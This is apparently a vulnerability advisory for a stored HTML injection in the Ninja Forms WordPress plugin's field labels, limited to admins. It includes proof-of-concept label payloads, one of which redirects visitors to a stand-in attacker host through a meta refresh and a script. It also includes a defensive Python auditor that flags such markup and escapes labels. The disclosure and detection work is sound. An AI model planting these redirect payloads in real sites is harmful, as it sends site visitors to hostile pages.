wpexploit | Sayandeep Dutta | WPEX-ID:558E06AB-704B-4BB1-BA7F-B5F6BBBD68D9
History: Aug 07, 2023 - 12:00 a.m.

Ninja Forms < 3.6.26 - Admin+ Stored HTML Injection


EPSS: 0.001 (Percentile: 23.9%)

Description

The plugin does not sanitize and escape its label fields, which could allow high-privilege users such as admins to perform stored HTML injection. Only users with the unfiltered_html capability can perform this, and such users are already allowed to use JS in posts, comments, etc.; however, the vendor acknowledged and fixed the issue.

Put the following code in the label of any form field (for example name, email, message, etc.):

<!DOCTYPE html>
<html>
<head>
  <style>
    @keyframes moving {
      0% { transform: translateX(0); }
      50% { transform: translateX(100px); }
      100% { transform: translateX(0); }
    }

    .horizontal-text {
      display: inline-block;
      animation: moving 2s infinite linear;
    }
  </style>
</head>
<body>
  <div class="horizontal-text">Sam</div>
</body>
</html>

or 

<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <meta http-equiv="refresh" content="0; URL=https://evil.com">
</head>
<body>
  <script>
    window.location.href = "https://evil.com";
  </script>
</body>
</html>
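
A defender-side check for the issue described above, as an added example that is not part of the original advisory or the plugin's code: it audits stored label values against a small tag allowlist and escapes labels on output. The allowlist, the field-to-label mapping, the sample values, and all function names are assumptions for illustration.

```python
import html
from html.parser import HTMLParser

# Assumption: labels may keep light inline formatting; anything else is flagged.
ALLOWED_TAGS = {"b", "strong", "i", "em", "span", "br"}
ALLOWED_ATTRS = {"class"}

# Constructed sample: field key -> stored label value (not a real plugin export).
SAMPLE_FIELDS = {
    "name": "Your <strong>full</strong> name",
    "email": '<meta http-equiv="refresh" content="0; URL=https://example.invalid">',
    "message": '<style>.x{animation:moving 2s infinite}</style><div class="x">Sam</div>',
}

class LabelAuditor(HTMLParser):
    """Collects every tag, attribute or declaration outside the allowlist."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"tag <{tag}>")
        for name, value in attrs:
            if name not in ALLOWED_ATTRS:
                self.findings.append(f"attribute {name} on <{tag}>")
            if tag == "meta" and name == "http-equiv" and (value or "").lower() == "refresh":
                self.findings.append("meta refresh redirect")

    def handle_decl(self, decl):
        self.findings.append(f"declaration <!{decl}>")

def audit_label(label):
    """Return the findings for one label value (empty list means clean)."""
    auditor = LabelAuditor()
    auditor.feed(label)
    auditor.close()
    return auditor.findings

def audit_form(fields):
    """Map field key -> findings, keeping only labels with disallowed markup."""
    report = {key: audit_label(label) for key, label in fields.items()}
    return {key: found for key, found in report.items() if found}

def render_label(label):
    """Output-side fix: escape the label so any markup is displayed as text."""
    return html.escape(label, quote=True)
```

Running `audit_form` over labels read from the site's stored forms shows which fields still carry markup saved before the plugin was updated to 3.6.26.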
